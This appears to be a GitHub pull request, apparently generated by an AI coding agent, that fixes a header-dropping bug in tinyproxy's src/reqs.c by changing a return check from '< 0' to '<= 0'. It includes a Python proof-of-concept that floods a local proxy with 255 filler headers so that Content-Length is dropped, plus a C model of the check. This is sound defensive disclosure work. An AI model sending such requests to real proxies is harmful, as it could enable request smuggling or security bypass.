Fix Header Dropping Vulnerability in reqs.c by sam-rendell · Pull Request #1 · sam-rendell/tinyproxy · GitHub

Fix Header Dropping Vulnerability in reqs.c#1

Open
sam-rendell wants to merge 1 commit into master from fix-header-dropping-vulnerability-8764017303393033696


@sam-rendell


Identify and fix a header dropping vulnerability in src/reqs.c caused by incorrect return value checking of add_header_to_connection. The function pseudomap_append returns 0 when the header limit (256) is reached, but src/reqs.c only checked for < 0. This allowed headers beyond the limit (e.g., Content-Length) to be silently dropped, potentially enabling HTTP Request Smuggling or Security Bypass.

The fix changes the check to <= 0 to correctly handle the failure case.

Vulnerability Details:

  • Severity: High
  • Description: Header Dropping leading to potential Request Smuggling.
  • Vulnerable Path: src/reqs.c:get_all_headers -> add_header_to_connection -> pseudomap_append
  • PoC:

```python
import socket

def attack():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('127.0.0.1', 8888))

    # Request to upstream
    req = "POST http://127.0.0.1:9999/ HTTP/1.1\r\n"
    req += "Host: 127.0.0.1:9999\r\n"

    # Send filler headers to reach limit (256)
    for i in range(255):
        req += f"H-{i}: v\r\n"

    # Next header is dropped
    req += "Content-Length: 5\r\n"
    req += "\r\n"
    req += "BODY1"

    s.sendall(req.encode())
    resp = s.recv(4096)
    print("Response:", resp)
    s.close()

if __name__ == "__main__":
    attack()
```

  • Mitigation: Change error check to if (... <= 0) in src/reqs.c.

PR created automatically by Jules for task 8764017303393033696 started by @sam-rendell
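
The return-value mismatch described above, as an added stand-alone model (not code from this pull request or from tinyproxy): it compares the `< 0` and `<= 0` checks against a bounded store that returns 0 when full. `hdr_store`, `model_append`, `collect` and `run_case` are hypothetical names, and the 1 / -1 return values are assumptions; only the 0-at-limit behaviour and the limit of 256 come from the description.

```c
#include <stdio.h>
#include <string.h>
#define HDR_LIMIT 256  /* header limit stated in the PR description */

/* Hypothetical bounded header store; not tinyproxy's real data structure. */
struct hdr_store { const char *names[HDR_LIMIT]; int count; };

/* 0 at the limit is from the PR text; 1 on success and -1 on bad args are assumed. */
static int model_append(struct hdr_store *s, const char *name)
{
    if (!s || !name) return -1;
    if (s->count >= HDR_LIMIT) return 0;
    s->names[s->count++] = name;
    return 1;
}

/* strict=0 models the old "< 0" check, strict=1 the fixed "<= 0" check.
 * Returns 0 if the request is accepted, -1 if it is rejected. */
static int collect(struct hdr_store *s, const char **names, int n, int strict)
{
    s->count = 0;
    for (int i = 0; i < n; i++) {
        int r = model_append(s, names[i]);
        if (strict ? r <= 0 : r < 0) return -1;
    }
    return 0;
}

/* Constructed input: 256 filler headers, then Content-Length as number 257. */
static int run_case(int strict, int *cl_stored)
{
    static const char *names[HDR_LIMIT + 1];
    static struct hdr_store s;
    for (int i = 0; i < HDR_LIMIT; i++) names[i] = "X-Filler";
    names[HDR_LIMIT] = "Content-Length";
    int rc = collect(&s, names, HDR_LIMIT + 1, strict);
    *cl_stored = 0;
    for (int i = 0; i < s.count; i++)
        if (strcmp(s.names[i], "Content-Length") == 0) *cl_stored = 1;
    return rc;
}

int main(void)
{
    int cl, rc = run_case(0, &cl);
    printf("check '< 0' : accepted=%d content-length stored=%d\n", rc == 0, cl);
    rc = run_case(1, &cl);
    printf("check '<= 0': accepted=%d content-length stored=%d\n", rc == 0, cl);
    return 0;
}
```

With the old check the request is accepted even though Content-Length was never stored; with the fixed check the same input is rejected.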

… check

Co-authored-by: sam-rendell <73448031+sam-rendell@users.noreply.github.com>
@google-labs-jules
